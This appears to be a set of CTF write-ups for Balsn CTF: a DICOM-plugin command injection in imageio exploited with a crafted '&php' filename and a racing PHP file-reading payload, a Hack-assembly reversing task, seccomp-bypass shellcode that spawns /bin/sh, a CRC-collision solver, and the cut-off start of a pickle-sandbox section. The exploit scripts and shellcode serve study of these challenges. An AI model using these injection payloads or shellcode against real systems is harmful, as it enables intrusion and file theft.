In this CTF, we destroyed both LC↯BC and PPP. lol.
We are presented with a minimal AI web challlenge. It uses AI (PHP + Python) to determine the shape of any image format using a current version of imageio. Additionally it’s stated that the author installed all necessary external plugins (beside Ghostscript) and the challenge server is running Windows Server 2019.
index.php:
<?php
...
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$file = $_FILES["file"];
if ($file["size"] > 1000000)
die("file too large");
set_time_limit(15);
ini_set('max_execution_time', 15);
$name = "C:/upload/" . basename($_FILES["file"]["name"]);
move_uploaded_file($file["tmp_name"], $name);
system("python getsize.py ".escapeshellarg($name));
unlink($name);
die();
}
...
getsize.py:
import sys, imageio
assert imageio.__version__ == '2.5.0'
print('(w, h) =', imageio.imread(sys.argv[1]).shape[:2])
We can upload arbitrary files to c:/upload/
and even set our own file name (restricted by basename
). The upload logic hinted at some command injection in the imageio
package.
So we decided to grep
for the most basic things in the huge amount of supported image formats:
~/.local/lib/python3.7/site-packages/imageio$ grep -iR subprocess
plugins/dicom.py:import subprocess
plugins/dicom.py: subprocess.check_call([fname, "--version"], shell=True)
plugins/dicom.py: subprocess.check_call([exe, fname1, fname2], shell=True)
...
The search seemed very fruitful as we are offered a nice subprocess.check_call
even with the shell=True
parameter set.
dicom.py
...
try:
dcm = _dicom.SimpleDicomReader(self.request.get_file())
except _dicom.CompressedDicom as err:
if "JPEG" in str(err):
exe = get_dcmdjpeg_exe()
if not exe:
raise
fname1 = self.request.get_local_filename()
fname2 = fname1 + ".raw"
try:
print(exe,fname1,fname2)
exit()
subprocess.check_call([exe, fname1, fname2], shell=True)
...
In the snippet it’s visible that if the dcim file contains a JPEG compressed image it’s simply passed into dcmjpeg.exe
even with the original filename.
We tried to craft an exploit command via the filename, but there were some problems with allowed characters in filenames.
Finally, we used filename&php
to terminate the arguments of dcmjpeg.exe
and start php
with the filename as an arg: dcmjpeg.exe filename&php filename&php.raw
So we need to create a correct DCIM + JPEG file. Additionally, we use a second upload to race the first one to pass a PHP payload into the same file.
#!/usr/bin/env python3
import requests, os, threading, time, uuid
url = 'http://silhouettes.balsnctf.com/'
f = str(uuid.uuid4())+'.dcm'
assert os.system('convert -size 1x1 xc:white hxp.jpg && img2dcm hxp.jpg hxp.dcm') == 0
def helper():
""" race with other upload """
while True:
files = [(
('file', (f, '<?php chdir("c:/");foreach(scandir(".") as $a){echo $a."\n";if(strpos($a,"F")!==false)echo file_get_contents($a);}', 'hxp/<3balsn'))
)]
response = requests.post(url, files=files)
print('.', end='', flush=True)
threading.Thread(target=helper).start()
time.sleep(0.5)
while True:
payload = '&php'
files = [(
('file', (f+payload, open('hxp.dcm', 'rb'), 'hxp/1337'))
)]
response = requests.post(url, files=files)
print(response.content.decode())
...
install.res.3082.dll
pagefile.sys
upload
vcredist.bmp
F!ag#$%&'()+,-.;=@[]^_`{}~ <- lol, thx Balsn
Balsn{Image_I0_7ragic!_I5_I7_a_z3r0_day?}
In this challenge we were given an assembly file consisting of ~31k lines for the Hack machine. The instruction set in fact deserves the term RISC (as opposed to, e.g., ARM): it has two registers (A
and D
), a pseudo-register for memory access, and only very few instructions. The code was generated using some compiler, which also includes a standard library.
Here is the beginning of the program:
@15872
D=A
@15616
M=D
@15617
M=D
@HPJCDQDO
D=A
@15617
A=M
M=D
@15617
...
An instruction beginning with an @
loads the following immediate operand into the A
register. The first thing to notice are the high numbers — which look like addresses due to their frequent occurance. The compiler contains some documentation on the memory layout. After digging into the compiler source, the following usage becomes evident:
0x3d00-0x3dff
: “Flag” storage, used for global variables, the stack pointer, and temporary storage needed by the compiler0x3e00-0x3fff
: “Stack”, used for storing local variables0x4000-0x5fff
: “Screen”0x6000
: Keyboard inputBy patching the compiler to print the assignment of variables to the “Flag” storage, we additionally get the following (not yet verified) knowledge. The output is in fact reasonable and at this point we (rightly) assume that the standard library was used for this program. This was very helpful to start understanding the program — in the above code snippet, the stack and base pointer are initialized.
String_set
: 3d1aarg
: 3d16cmp
: 3d04ebp
: 3d00esp
: 3d01tmp
: 3d15tmp_obj0
: 3d02tmp_obj1
: 3d03tmp_obj10
: 3d0etmp_obj11
: 3d0ftmp_obj12
: 3d10tmp_obj2
: 3d06tmp_obj3
: 3d07tmp_obj4
: 3d08tmp_obj5
: 3d09tmp_obj6
: 3d0atmp_obj7
: 3d0btmp_obj8
: 3d0ctmp_obj9
: 3d0dvar1
: 3d11var2
: 3d12var3
: 3d13var4
: 3d14Next, we tried to find function calls and functions. Using some patterns coded into the compiler, this was easy to achieve. Together with some manual analysis, we found some standard library function and replaced these with pseudo-instructions in the text. The compiler also has some inlining functionality, which however keeps the prologue and epilogue and just removes the jumps. After this manual transformation (assisted with find&replace), the program contained only direct jumps.
Unfortunately, the main program was not split in functions, and still was pretty big (26k lines).
A full manual analysis of the code is entirely unfeasible due to size. At this point, we did some semi-automated parsing of the code, splitting the code in basic blocks and replacing the indirect M
register with the explicit notion M[A]
. On this basis, we did some simple textual expression folding, replacing A
and D
with the values from the last assignment. We also replaced the addresses of some frequently used variables (see above) with a name for readability.
The transformed code now looks like this and has only 7.2k lines:
...
Block 10
(SEPFTDLJ)
esp=esp+1
var2=ebp+0x9
M[var2]=M[0x3d1a]
var3=ebp+0x9
cmp=M[var3]
/JNE(cmp) DFXDGDTT
...
We then folded the expressions setting the variables var1
/var2
/var3
/var4
, significantly increasing readability:
Block 10
(SEPFTDLJ)
esp=esp+1
M[ebp+0x9]=M[0x3d1a]
cmp=M[ebp+0x9]
/JNE(cmp) DFXDGDTT
At this point, some frequently repeating code pattern got visible, which loaded some values from a memory location with a constant offset each, added them with a constant number, and compared them with another constant. That buffer was previously filled from the keyboard memory location — where the challenge asked the flag to be entered. So we extracted these conditions (using regexes with several manual fixups) and ended up with 78 constraints, with offsets ranging from 0–25:
(-0x13a + buf[0x5] + buf[0x6] + buf[0xd] + buf[0xf]) == 0x52
(-0xf3 + buf[0x16] + buf[0x18] + buf[0x16]) == 0x15
(-0x1c + buf[1] + buf[0xb] + buf[0x11] + buf[0x3]) == 0x13a
(0x101 + buf[0x14] + buf[0x7] + buf[0xa] + buf[0x18]) == 0x249
(0x28 + buf[0x4] + buf[0x19] + buf[0x15]) == 0x176
(-0x97 + buf[0x9] + buf[0x9] + buf[0x10] + buf[0x15]) == 0xef
(-0x1bf + buf[1] + buf[0x15] + buf[0x8] + buf[0x8]) == -0x17
(-0xe + buf[0xa] + buf[0xb] + buf[0xb]) == 0x95
(0xf8 + buf[0x10] + buf[0x13] + buf[0x15] + buf[0x13]) == 0x290
(-0x15a + buf[0xc] + buf[0x16] + buf[0x0] + buf[0x4]) == -0x12
(-0x193 + buf[0x18] + buf[0x9] + buf[1]) == -0x61
(0x45 + buf[1] + buf[0x5] + buf[0x15] + buf[0xc]) == 0x1d1
(0x8 + buf[0x0] + buf[0xc] + buf[0x7]) == 0xf6
(-0xc5 + buf[0xf] + buf[0x12] + buf[0xf]) == 0x32
(-0x8b + buf[0xd] + buf[0x19] + buf[0x0]) == 0xa4
(0x1ba + buf[0x17] + buf[1] + buf[0x14]) == 0x2b4
...
Using Z3 we found a solution for these constraints: Balsn{U_r_C0Mp1LeR_h4cKer}
In this shellcoding challenge, the program executes the code first under a forked child with a strong seccomp filter, and only if that exits cleanly, the code is executed again under the parent process without a seccomp filter.
In pseudo-code, the main function looks like this:
page = mmap(NULL, 0x1000, RWX, MAP_PRIVATE|MAP_ANONYMOUS)
read(0, page, 0x1000)
pid = fork()
if pid == 0
init_seccomp() // only allow exit and exit_group syscalls
goto exec_code
if wait(pid) != 0 // if pid exited with non-zero exit code
return 0
exec_code:
... // zero registers and flags
jmp page
The shellcode must exit cleanly with code 0 the first time, so that the second time we can use execve
to get a shell.
As the code page is mapped as private, all mappings are copy-on-write after the fork and there is no (obvious) way to pass some indication of the execution count from the child process to the parent. In fact, we did not search for other means to detect the forked child (perhaps measuring the memory access time due to CoW page faults is feasible?).
Instead, we went for the probabilistic route. Modern x86 processors provide the instruction rdrand
, which sets a register to a random value. At the beginning of the shellcode, we use a single bit of that randomness to decide whether we exit cleanly or try to run execve
. This strategy succeeds with a probability of execve
in the second execution (prob.
Flag: Balsn{Sam3_Cod3_Same_Cont3xt_Diff3r3nt_World}
The full shellcode (28 bytes):
mov al, 0x3c # exit
rdrand ebx
test bl, 1
jz 1f
lea rdi, [rdx+0x14]
xor edx, edx # addr of current page is in rdx
mov al, 0x3b # execve
1:syscall
2:.asciz "/bin/sh"
We are faced with a script that takes as input a password, “destroys” it using a finite-field exponentiation, AES, and DES, and finally compares its hash values under many different hash functions against known target values. If all the hash values match, we get the flag:
# [imports]
def omnihash(x):
ret = subprocess.check_output(['omnihash', '-jcs'], input=x)
return json.loads(ret)[0][0]
def printflag(x):
# Update August, 2004 (commit 40de8d): MD5 is broken...
if hashlib.sha1(x).hexdigest() != '3a4a6c4047f9350493cdabcf719d8e4f3b3c1f2f':
print('I said you shall not pass!!!')
return False
# Update Feb, 2017 (commit 56fcd9): Fxxk, SHA1 is broken too
if hashlib.sha3_224(x).hexdigest() != 'c529d3db40ac50bf3b5c1957b7ef4e632f6fb34ae83b165caed6658d':
print('Why do you keep trying to hack into my home???? Go away QAQQQQQQ!!!!!')
return False
# Update May, 2019 (commit c10d5a): Check all well-known hashes
# Destroy the value
p = int("""\
6816b2bba5ad70478c1beadb176b9ab17cb172841b10277f538f9d837f2\
2bdd807b970605c63859c739571cc535fd0c6879149b2d2eb676a182fd7\
5ff343e75a22ce75c36a775157c34f17\
""".replace(' ', ''), 16)
x = bytes_to_long(x)
x = pow(x, 31337, p)
x = long_to_bytes(x)
# Destroy again
for _ in range(10):
k = x[:16]
aes = AES.new(k, AES.MODE_CFB, k)
x = aes.encrypt(x[16:]) + k
# Destroy one more time
x = b'QAQQAQQQ' + x
for _ in range(10):
k = hashlib.sha256(x[:8]).digest()[:8]
des = DES.new(k, DES.MODE_CFB, k)
x = k + des.encrypt(x[8:])
# Check
x = x + b'OAOOAOOO'
hash = omnihash(x)
with open('hash.json') as f:
target = json.load(f)
if all(hash[k] == v for k, v in target.items()):
with open('../flag.txt') as f:
print(f.read())
The given list of hashes in hash.json
is:
{
"BLAKE2B512": "ea79779358bda662d24c2d28ec0c3b810848302687b5665d0551265081331288ce2f8b2763e9a31cfaa52ef47a602b6c14e89a1025434c16fd5896da2d013eb0",
"BLAKE2S256": "6ea2c8f7806c003125213b7cdbf2074b766180d2c58e2a55f36f9c9c3022ae8f",
"BLAKE2b": "ea79779358bda662d24c2d28ec0c3b810848302687b5665d0551265081331288ce2f8b2763e9a31cfaa52ef47a602b6c14e89a1025434c16fd5896da2d013eb0",
"BLAKE2s": "6ea2c8f7806c003125213b7cdbf2074b766180d2c58e2a55f36f9c9c3022ae8f",
"CRC-16": "0x4a58",
"CRC-16-BUYPASS": "0x6af0",
"CRC-16-DDS-110": "0x48fc",
"CRC-16-DECT": "0x2419",
"CRC-16-DNP": "0x9d58",
"CRC-16-EN-13757": "0x4d2e",
"CRC-16-GENIBUS": "0x45fd",
"CRC-16-MAXIM": "0xb5a7",
"CRC-16-MCRF4XX": "0x67b3",
"CRC-16-RIELLO": "0x9ece",
"CRC-16-T10-DIF": "0xec3c",
"CRC-16-TELEDISK": "0xc82c",
"CRC-16-USB": "0x3556",
"CRC-24": "0x61059d",
"CRC-24-FLEXRAY-A": "0xf397e7",
"CRC-24-FLEXRAY-B": "0xdd6f70",
"CRC-32": "0x9609704aL",
"CRC-32-BZIP2": "0x50d40806L",
"CRC-32-MPEG": "0xaf2bf7f9L",
"CRC-32C": "0xf1dbb20eL",
"CRC-32D": "0xfcc86807L",
"CRC-32Q": "0x9c13e09L",
"CRC-64": "0xb434f60b0a312231L",
"CRC-64-JONES": "0xc1a828859dc5cca2L",
"CRC-64-WE": "0xa73a797a702a9d81L",
"CRC-8": "0xd2",
"CRC-8-DARC": "0x87",
"CRC-8-I-CODE": "0x5e",
"CRC-8-ITU": "0x87",
"CRC-8-MAXIM": "0xb1",
"CRC-8-ROHC": "0x4b",
"CRC-8-WCDMA": "0x44",
"CRC-AUG-CCITT": "0x643e",
"CRC-CCITT-FALSE": "0xba02",
"GIT-BLOB": "623a652aa849645e37e27583b4686eb53727edb1",
"GIT-COMMIT": "a3c12b0d72a7ba07a99fd069af7c04612999ff8a",
"GIT-TAG": "1328ff8710ff34f9fef1b982894f44cf81d74d10",
"JAMCRC": "0x69f68fb5L",
"KERMIT": "0x4e2e",
"LENGTH": "91",
"MD4": "cc6ddaafe37274d514ea0e6026235b02",
"MD5": "4a254cb1e5a266d44eeb923bf2135e63",
"MD5-SHA1": "4a254cb1e5a266d44eeb923bf2135e6339cb6d6bf082ad0283b3b07991b50de7c087db8c",
"MODBUS": "0xcaa9",
"POSIX": "0xf6273a4fL",
"RIPEMD160": "511e1ad8a02b04e5a017b1c6250695a999f98399",
"SHA1": "39cb6d6bf082ad0283b3b07991b50de7c087db8c",
"SHA224": "ca2de7bcf59bc523af5bfc3d14cfa15e9de732742e20785b5f8e1c0b",
"SHA256": "821d0319b4d80a89af03ff7df5bb7aac56363c38000273acb7e6a2858d3267b5",
"SHA3-224": "12785de06107874d20e1b75e3efa367c00e6704b532854720616d45a",
"SHA3-256": "2836991a2e289d04af9f9366ae0983c23e0b4f6c0597d56caf5525348c1ae51a",
"SHA3-384": "19542c695041c5acec2ff04fe033536e41f29138a65a12a76d7f122ae5b1a6ce3cbdebc0a44c24c0e2105f7a3435ad1e",
"SHA3-512": "6accef14e12441918be765b545ba457e9809be1515130d5d7c41df82e976fceb2c3adaba0bee5f5c81fe93ffad9b31a9c3308432d0cec7645e4a3afaf1d7aaf3",
"SHA384": "e86e0f699f2511e6dd4798762534274204b570a1d6f771b4c9a8715dcab245aaff0a397a905d3625ef1d1d003243a51b",
"SHA3_224": "12785de06107874d20e1b75e3efa367c00e6704b532854720616d45a",
"SHA3_256": "2836991a2e289d04af9f9366ae0983c23e0b4f6c0597d56caf5525348c1ae51a",
"SHA3_384": "19542c695041c5acec2ff04fe033536e41f29138a65a12a76d7f122ae5b1a6ce3cbdebc0a44c24c0e2105f7a3435ad1e",
"SHA3_512": "6accef14e12441918be765b545ba457e9809be1515130d5d7c41df82e976fceb2c3adaba0bee5f5c81fe93ffad9b31a9c3308432d0cec7645e4a3afaf1d7aaf3",
"SHA512": "62074634d716800b66386e0e10a601a21eedcc7fcd4d847692cf0cb9d3cdc469dbb7cbd53be4b5d5d91fdc20edf1ab1c2abe8678f04055f3ef450561771f37b1",
"SHA512-224": "091f4443f53089fbc66bc32caf77be0090a5188a0b9eaf5100057142",
"SHA512-256": "4b37d93916d0a2e1a0a75481049b43942f127ed33ad58288f3be555b11ae8fb3",
"SHAKE128": "d7ae67597dc6cd63c303f59aad1151d8",
"SHAKE256": "7bba948c75cfc3570b76772ea9d6011d150beda285c7a3253ea856253b5a0646",
"SM3": "d5e3c17e576e22ce7797e4cd946e4f9f3b48ff9da3bf0c94a48235702c1d57cb",
"WHIRLPOOL": "343a45063c39bf2cb95bc689744c10ce70e740b38df1c985ce5fb610b80bd9ca973d7872278dc92238a90ca2030f3c2c6129127486bb91ce82068cb0a1636e81",
"X-25": "0x984c",
"XFER": "0x8244182bL",
"XMODEM": "0x396"
}
Given this, we immediately notice the presence of lots of CRCs in the list—a notoriously non-cryptographic checksum. Before recovering the plaintext from these CRCs, let’s first quickly invert the “destroy” part that’s applied to the flag prior to hashing:
def undestroy(x):
assert x[-8:] == b'OAOOAOOO'
x = x[8:-8]
ks = []
while len(ks) < 10:
ks.append(hashlib.sha256(ks[-1] if ks else b'QAQQAQQQ').digest()[:8])
for k in reversed(ks):
des = DES.new(k, DES.MODE_CFB, k)
x = des.decrypt(x)
for _ in range(10):
k = x[-16:]
aes = AES.new(k, AES.MODE_CFB, k)
x = k + aes.decrypt(x[:-16])
x = bytes_to_long(x)
x = int(pow(x, ZZ(Mod(31337,p-1)**-1), p))
x = long_to_bytes(x)
return x
(All the attack code in this writeup is sage
code.)
Now let’s see how we can recover the plaintext from the CRCs.
We can see that after being “destroyed”, the input to these CRCs is at most 91 bytes long; that’s the size of omnihash
’s source code to look for the code implementing all those hash functions; we were probably going to need that anyway. Indeed, in crcmod-1.7/python2/crcmod/predefined.py
we find a big table of all CRCs in the list including their exact definitions:
_crc_definitions_table = [
# Name Identifier-name, Poly Reverse Init-value XOR-out Check
[ 'crc-8', 'Crc8', 0x107, NON_REVERSE, 0x00, 0x00, 0xF4, ],
[ 'crc-8-darc', 'Crc8Darc', 0x139, REVERSE, 0x00, 0x00, 0x15, ],
[ 'crc-8-i-code', 'Crc8ICode', 0x11D, NON_REVERSE, 0xFD, 0x00, 0x7E, ],
[ 'crc-8-itu', 'Crc8Itu', 0x107, NON_REVERSE, 0x55, 0x55, 0xA1, ],
[ 'crc-8-maxim', 'Crc8Maxim', 0x131, REVERSE, 0x00, 0x00, 0xA1, ],
[ 'crc-8-rohc', 'Crc8Rohc', 0x107, REVERSE, 0xFF, 0x00, 0xD0, ],
[ 'crc-8-wcdma', 'Crc8Wcdma', 0x19B, REVERSE, 0x00, 0x00, 0x25, ],
[ 'crc-16', 'Crc16', 0x18005, REVERSE, 0x0000, 0x0000, 0xBB3D, ],
[ 'crc-16-buypass', 'Crc16Buypass', 0x18005, NON_REVERSE, 0x0000, 0x0000, 0xFEE8, ],
[ 'crc-16-dds-110', 'Crc16Dds110', 0x18005, NON_REVERSE, 0x800D, 0x0000, 0x9ECF, ],
# [...]
[ 'crc-32q', 'Crc32Q', 0x1814141AB, NON_REVERSE, 0x00000000, 0x00000000, 0x3010BF7F, ],
[ 'jamcrc', 'CrcJamCrc', 0x104C11DB7, REVERSE, 0xFFFFFFFF, 0x00000000, 0x340BC6D9, ],
[ 'xfer', 'CrcXfer', 0x1000000AF, NON_REVERSE, 0x00000000, 0x00000000, 0xBD0BE338, ],
# 64-bit
# Name Identifier-name, Poly Reverse Init-value XOR-out Check
[ 'crc-64', 'Crc64', 0x1000000000000001B, REVERSE, 0x0000000000000000, 0x0000000000000000, 0x46A5A9388A5BEFFE, ],
[ 'crc-64-we', 'Crc64We', 0x142F0E1EBA9EA3693, NON_REVERSE, 0x0000000000000000, 0xFFFFFFFFFFFFFFFF, 0x62EC59E3F1A4F00A, ],
[ 'crc-64-jones', 'Crc64Jones', 0x1AD93D23594C935A9, REVERSE, 0xFFFFFFFFFFFFFFFF, 0x0000000000000000, 0xCAA717168609F281, ],
]
Adding up all the lengths shows that the information contained in the given CRCs is approximately 912 bits; quite a bit more than the 91 bytes we need, which inspires hope. (Note it’s not clear, nor actually true, that the given chunks contain distinct bits of information. See below.)
At this point, there’s two possible approaches:
Know that computing a CRC essentially consists of reducing the input modulo a fixed polynomial over
Know that CRCs are linear and solve a linear system over
We took the second approach, thus:
hash.json
.Trying this, we ran into the complication that the matrix
To remedy this problem, we add additional known constraints from the “destroy” part of the given script: We know that the plaintext we’re looking for must begin with a ten-fold SHA256
hash of "QAQQAQQQ"
, cut off after "OAOOAOOO"
. By augmenting hash.json
target file.
Here’s the sage
script (beware, messy CTF code) that implements all of this and for convenience immediately sends the password to the server to get the flag:
# [imports and code copied from the task]
R.<x> = GF(2)[]
num2poly = lambda n: sum(((n >> i) & 1) * x**i for i in range(int(n).bit_length()+5))
poly2num = lambda f: f.change_ring(ZZ)(2)
crcs = dict()
for name,_,poly,rev,ixor,oxor,chk in _crc_definitions_table:
crcs[name.upper()] = {
'poly': num2poly(poly),
'bits': int(num2poly(poly).degree()),
'rev': rev,
'ixor': ZZ(ixor),
'oxor': ZZ(oxor),
'chk': chk,
}
del name,poly,rev,ixor,oxor,chk
def mycrc(name, bs):
data = crcs[name]
poly, bits, rev, ixor, oxor = data['poly'], data['bits'], data['rev'], data['ixor'], data['oxor']
if rev:
bs = ''.join(chr(int('{:08b}'.format(ord(x))[::-1],2)) for x in bs)
res = 0
res = num2poly(ixor ^^ oxor)
if rev:
res = R(x**(bits-1) * res(1/x))
res *= x**(8*len(bs))
res += x**bits * num2poly(bytes_to_long(bs))
res %= poly
if rev:
res = R(x**(bits-1) * res(1/x))
res += num2poly(oxor)
return poly2num(res)
target = json.loads(open('hash.json').read())
target = {k:int(v.rstrip('L'),16) for k,v in target.items()}
names = list(sorted(crcs.keys()))
num2vec = lambda l,n: vector(GF(2), [(n >> i) & 1 for i in range(l)])
def allcrcs(bs):
v = matrix(GF(2),1,0)
for name in names:
v = v.augment(num2vec(crcs[name]['bits'], mycrc(name, bs)).row())
return v
l = 91
v0 = allcrcs(b'\0'*l)
t = matrix(GF(2),1,0)
for name in names:
t = t.augment(num2vec(crcs[name]['bits'], target[name]).row())
# takes a while, so better cache it
try:
mat = load('/tmp/mat')
except IOError:
mat = matrix(GF(2), 0, sum(crcs[name]['bits'] for name in names))
for i in range(8*l):
row = allcrcs(long_to_bytes(2**i).rjust(l,b'\0'))
mat = mat.stack(row - v0)
mat.dump('/tmp/mat')
prefix = b'QAQQAQQQ'
for _ in range(10):
prefix = hashlib.sha256(prefix).digest()[:8]
off_prefix = 83
for i in range(8*len(prefix)):
mat = mat.augment(vector([j==i+8*off_prefix for j in range(mat.nrows())]).column())
v0 = v0.augment(vector([0]*8*len(prefix)).row())
t = t.augment(vector((bytes_to_long(prefix) >> i) & 1 for i in range(8*len(prefix))).row())
suffix = b'OAOOAOOO'
for i in range(8*len(suffix)):
mat = mat.augment(vector([j==i for j in range(mat.nrows())]).column())
v0 = v0.augment(vector([0]*8*len(suffix)).row())
t = t.augment(vector((bytes_to_long(suffix) >> i) & 1 for i in range(8*len(suffix))).row())
print(mat.left_kernel().dimension())
sol = vector(mat.solve_left(t - v0))
print(sol)
for kervec in mat.left_kernel():
res = long_to_bytes(sum(ZZ(s) << i for i,s in enumerate((sol + kervec).list())))
password = undestroy(res)
print res.encode('hex'), password.encode('hex')
if int(hashlib.sha256(res).hexdigest(),16) == target['SHA256']:
print('YES!!')
break
else:
print('nope...')
exit()
print('--> \x1b[32m{}\x1b[0m'.format(password.encode('hex')))
print
print('-'*40)
print
import socket, telnetlib
sock = socket.socket()
sock.connect(('collision.balsnctf.com', 5451))
sock.sendall('{}\n'.format(password.encode('hex')))
tel = telnetlib.Telnet()
tel.sock = sock
tel.interact()
Running this script prints:
10
(1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0)
5a208546900315b4003770f30d6f3342b535cbf6f6396ee48fcf4987ccecdf4e8e8fe347851f106f9faf5ff22600ecac08ef8059f83a751c83a000fd284a713ebad2ec48422f808d2ead2fd927aad2c756a8f44f414f4f414f4f4f 2be3f5e4a1e235701fbf4db26b42dfc7bc41083b1e2da552ad8737859e847930453bce9e89a4e5a70b0dd739c4c107fd880f834c687717d6ba0fbfda4dd900635950f2e0b49a9d3abee948
5a208546900315b4647326c853850133a526b99f935ee6bc9f0cf6ce274925252a90da2dcd7a66af6fe4cd185a7174353be5521bdd9566edc8584512ee8207bc721d595707cab4eb34654ea3b99591c7bcaef54f414f4f414f4f4f 1cb3054fd88dae943fef2f4fe4bcf375ce74a6838d9336232a85d053c56f70b51a07c6fb5c8627ff2777bc950a077a4b36175fa22c0bc0f3c7da65039ba1e518dd1d48e4e546f9e18ecdc1
[...]
5a208546900315b46b3b718e6c0fa67cc1f709517ae50efe1eed0c62d1310378e7744f5e486104857a69d0c08b30d21ed7ae97b2d01b17ee8a1d1e90b2707ed0d74ef3c0569834cf825ac85775f25c2c854c5a4f414f4f414f4f4f 233137e79523246abd35fa1ca21cb0f2cb257663069202e2901d8d804fa2c396c63b57b770ae2da6f4eb617674469d1cc22d30a41201f42616bf13cf3bb351d0d4f2951460bab8646d6119
5a208546900315b40f7f27b532e5940dd1e47b381f8286a60e2eb32b3a94f913436b7634000472458a22422af7414a87e4a445f0f5b4041fc1e55b7f74b808521f8146df137d00a99892a92debcd1f2c6f4a5b4f414f4f414f4f4f 5eac13489c7cdd6ae99417b0f27953a0534a69c836d8bd09b9dd34ed9f2df8392bee6fba1140126a67c83edf4782606c0f898b300563e6e5b56277c0a407277d268435c8432d699eb818ba
5a208546900315b484c09c5e29ce4f4f8209d4bbc96ed42c8abff23cf57023b8b611a41ebc69f59e79a301aa654e7c24a768dae955050b4b7a4efdf23fe99da0806d5b58a60933ae2bbc6a25ff9d11b0179a444f414f4f414f4f4f c7d0425d8f844bd7c5fc59005ca6b56f12e971d32a82004dda88d3ad4766e75ced502149347257ffb0cd8a99bdc39598d2107cbdd35b501257156b095da5f31d
YES!!
--> c7d0425d8f844bd7c5fc59005ca6b56f12e971d32a82004dda88d3ad4766e75ced502149347257ffb0cd8a99bdc39598d2107cbdd35b501257156b095da5f31d
----------------------------------------
Password: Enjoy your flag :)
Balsn{Th3_M0r3__7He_bEtT3r??}
*** Connection closed by remote host ***
In this series of challenges, we were given Python (v3) services which deserialize user-provided data using the Python pickle
module. As increased difficulty, the scope of modules accessible from the pickle was severely restricted. Overall, I enjoyed solving these challenges a lot.
A pickle is essentially a program for a stack machine, where the last element on the stack at the end is returned as unpickled object.
However, the instructions do not provide full access to operations but are limited to operations needed for deserialization. For example, a __setitem__
operation is provided, but not a complementing __getitem__
operation.
Here are some instructions we used for this challenge:
Operation | Stack Before | Stack After | Operation |
---|---|---|---|
GLOBAL (c<module>\n<attr>\n ) |
* |
* <module.attr> |
Resolve module.attr |
NONE (N ) |
* |
* <None> |
None |
STRING (S"<str>"\n ) |
* |
* <str> |
Constant string |
POP (0 ) |
* <x> |
* |
Pops/removes an element from the stack |
